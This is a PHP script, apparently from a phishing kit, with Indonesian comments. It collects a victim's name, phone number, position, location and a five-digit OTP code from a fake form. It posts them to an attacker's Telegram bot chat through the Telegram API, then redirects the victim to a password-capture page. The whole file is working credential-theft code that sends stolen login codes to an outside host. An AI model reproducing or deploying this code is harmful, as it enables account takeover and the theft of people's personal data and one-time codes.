<?php
session_start(); // Mulai sesi

// Termasuk file konfigurasi
require '../config.php'; // Pastikan ini menunjuk ke file yang benar

// Ambil data dari session dan form
$position = isset($_SESSION['position']) ? $_SESSION['position'] : '';
$location = isset($_SESSION['location']) ? $_SESSION['location'] : '';
$name = isset($_SESSION['name']) ? $_SESSION['name'] : '';
$phone = isset($_SESSION['phone']) ? $_SESSION['phone'] : '';

// Ambil OTP dari form dan gabungkan menjadi satu string
$otp = $_POST['otp1'] . $_POST['otp2'] . $_POST['otp3'] . $_POST['otp4'] . $_POST['otp5'];

// Simpan data baru ke dalam session
$_SESSION['otp'] = $otp;

// Format pesan yang akan dikirim ke Telegram
$message = "•┌─────═━┈🔑┈━═─────┐•\n";
$message .= " ║\n";
$message .= " ╠➥ *Posisi:* `{$position}`\n";
$message .= " ║\n";
$message .= " ╠➥ *Lokasi:* `{$location}`\n";
$message .= " ║\n";
$message .= " ╠➥ *Nama:* `{$name}`\n";
$message .= " ║\n";
$message .= " ╠➥ *Nomor HP:* `{$phone}`\n";
$message .= " ║\n";
$message .= " ╠➥ *Kode OTP:* `{$otp}`\n";
$message .= " ║\n";
$message .= "•└─────═━┈📱┈━═─────┘•";

// URL API Telegram
$url = "https://api.telegram.org/bot{$apiToken}/sendMessage";

// Data yang akan dikirim ke API Telegram
$data = array(
    'chat_id' => $chatId,
    'text' => $message,
    'parse_mode' => 'MarkdownV2'
);

// Gunakan cURL untuk mengirim data ke Telegram
$options = array(
    'http' => array(
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
        'method'  => 'POST',
        'content' => http_build_query($data)
    )
);
$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);

if ($result === FALSE) {
    die('Error sending message');
}

// Redirect ke halaman berikutnya (pass.html)
header('Location: ../data/pass.html');
exit();
?>
